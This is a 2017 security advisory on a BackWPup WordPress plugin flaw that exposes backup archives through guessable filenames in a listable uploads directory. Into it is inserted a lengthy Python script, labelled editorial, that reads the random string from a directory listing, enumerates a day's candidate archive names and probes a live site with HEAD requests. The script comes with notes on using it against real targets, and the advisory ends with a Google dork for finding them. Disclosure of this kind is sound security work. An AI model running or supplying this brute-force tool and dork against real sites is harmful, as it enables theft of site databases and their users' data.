Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download |
Author: Larry W. Cashdollar, @_larry0 |
Date: 2017-09-08 |
CVE-ID:[CVE-2017-2551] |
CWE: CWE-552 Files or Directories Accessible to External Parties |
Download Site: https://wordpress.org/plugins/backwpup |
Vendor: Inpsyde |
Vendor Notified: 2017-09-08 |
Vendor Contact: plugins@wordpress.org |
Advisory: http://www.vapidlabs.com/advisory.php?v=201 |
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more." |
Vulnerability: There is a weakness in the way BackWPup creates and stores the backup files it generates. It prefixes the archive name with a random string to obscure its location, but it uses that same string to name the storage directory under wp-content/uploads/, and on many WordPress installations that directory allows file listings.
Someone looking to steal a copy of the database can simply list wp-content/uploads/ to recover the random string and then brute force the rest of the filename, which is just a date and time stamp. Guessing whether a backup exists for a given day takes at most 86400 tries (one per second of that day).
Filename format:
backwpup_RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s
Default settings are:
%Y = Four digit representation of the year
%m = Two digit month, with leading zeros
%d = Two digit day of the month, with leading zeros
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second
I have an exploit available if you're interested.
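The search described above, as an added example: this is editorial code, not the advisory author's exploit and not BackWPup's own code. It recovers the random string from a constructed, Apache-style listing of wp-content/uploads/, then enumerates every candidate filename for one day in the format given above. The directory name "backwpup-<randomstring>-backups/" and the .zip extension are assumptions, since the page does not state either.

```python
"""
Candidate generator for the BackWPup filename brute force described above.

Added example, not the advisory author's exploit and not BackWPup code.
Assumptions not stated on the page: the storage directory under
wp-content/uploads/ is named "backwpup-<randomstring>-backups/", the archive
extension is .zip, and SAMPLE_LISTING is a constructed autoindex page.
"""
import re
import urllib.error
import urllib.request
from datetime import date, datetime, timedelta
from typing import Iterable, Iterator, List, Tuple

# Constructed sample: what a listable /wp-content/uploads/ index might return.
SAMPLE_LISTING = """<html><body><h1>Index of /wp-content/uploads</h1>
<a href="2017/">2017/</a>
<a href="backwpup-a1b2c3-backups/">backwpup-a1b2c3-backups/</a>
<a href="backwpup-a1b2c3-logs/">backwpup-a1b2c3-logs/</a>
</body></html>"""

SAMPLE_DAY = date(2017, 9, 8)  # the advisory date, used here as the day to search

# Assumed directory naming: the random string is the token after "backwpup-".
DIR_RE = re.compile(r'href="(backwpup-([0-9a-z]+)[^/"]*)/"')


def listing_enabled(body: str) -> bool:
    """Crude check that a response body is an autoindex page, not a 403 or blank page."""
    return "Index of /" in body


def find_backwpup_dirs(listing_html: str) -> List[Tuple[str, str]]:
    """Return (directory_name, randomstring) pairs found in a directory listing."""
    return [(m.group(1), m.group(2)) for m in DIR_RE.finditer(listing_html)]


def candidate_names(randomstring: str, job_id: int, day: date, ext: str = "zip",
                    start_hour: int = 0, end_hour: int = 24) -> Iterator[str]:
    """Yield backwpup_<randomstring><job_id>_%Y-%m-%d_%H-%i-%s.<ext> for each second of `day`.

    PHP's %i (minutes) is Python's %M. A full day is 86400 names; the
    [start_hour, end_hour) window narrows that when the job schedule is known.
    """
    first = datetime(day.year, day.month, day.day, start_hour)
    for sec in range((end_hour - start_hour) * 3600):
        ts = first + timedelta(seconds=sec)
        yield f"backwpup_{randomstring}{job_id}_{ts.strftime('%Y-%m-%d_%H-%M-%S')}.{ext}"


def probe(base_url: str, dirname: str, names: Iterable[str], timeout: float = 5.0) -> List[str]:
    """HEAD each candidate URL and return those answering 200. Network only; not run offline."""
    found = []
    for name in names:
        url = f"{base_url.rstrip('/')}/wp-content/uploads/{dirname}/{name}"
        req = urllib.request.Request(url, method="HEAD")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    found.append(url)
        except urllib.error.HTTPError:
            continue  # 404/403: not this timestamp, keep going
        except urllib.error.URLError:
            break     # host unreachable: stop rather than burn 86400 requests
    return found


if __name__ == "__main__":
    for dirname, rnd in find_backwpup_dirs(SAMPLE_LISTING):
        names = list(candidate_names(rnd, 1, SAMPLE_DAY))
        print(dirname, rnd, len(names), names[0], names[-1])
```

Against a live target, `probe()` would take the directory name from `find_backwpup_dirs()` and the day's 86400 names from `candidate_names()`; if the backup job's scheduled hour is known, the hour window shrinks the search by the same factor. The same generator also serves a defender who wants to confirm their own archive names are guessable.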
Exploit Code:
Screen Shots: |
Notes: Google Dork: inurl:wp-content/uploads/backwpup |